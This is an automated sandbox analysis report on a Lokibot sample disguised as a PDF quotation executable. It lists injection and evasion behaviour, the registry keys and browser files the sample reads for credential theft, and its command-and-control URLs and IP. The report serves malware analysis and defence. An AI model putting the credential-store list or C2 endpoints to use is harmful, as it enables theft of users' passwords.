          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0040604C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404772
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040549C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_004029D4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 00405B6F appears 42 times
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292277213.0000000003196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292572602.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\user\Desktop\QUOTAZIONEpdf.exeJump to behavior
          Source: QUOTAZIONEpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsr3B69.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/6@56/2
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp

          Data Obfuscation:

          Yara detected aPLib compressed binary
          Source: Yara match | File source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_72FB1000 push eax; ret
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_00402AC0 push eax; ret
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll

          Hooking and other Techniques for Hiding and Protection:

          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (27).png
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Process information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe TID: 4772 | Thread sleep time: -840000s >= -30000s
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Thread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | API call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_0019E79A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_0019EADC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_0019EA5F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_0019EA9E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_0019E9AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion:

          Injects a PE file into foreign processes
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Memory written: C:\Users\user\Desktop\QUOTAZIONEpdf.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Process created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_00406069 GetUserNameW,

          Stealing of Sensitive Information:

          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: PopPassword
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: SmtpPassword
Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected Lokibot
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | Credentials in Registry 2 | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Security Account Manager | System Information Discovery 5 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 11 | NTDS | Security Software Discovery 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 11 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Screenshots

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
QUOTAZIONEpdf.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
2.0.QUOTAZIONEpdf.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.1.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2

          Domains

Source | Detection | Scanner | Label
slimpackage.com | 5% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://slimpackage.com/slimmain/five/fre.php | 9% | Virustotal |
http://slimpackage.com/slimmain/five/fre.php | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
slimpackage.com | 104.223.93.105 | true | true | | unknown

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://slimpackage.com/slimmain/five/fre.php | true | Virustotal: 9%; Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
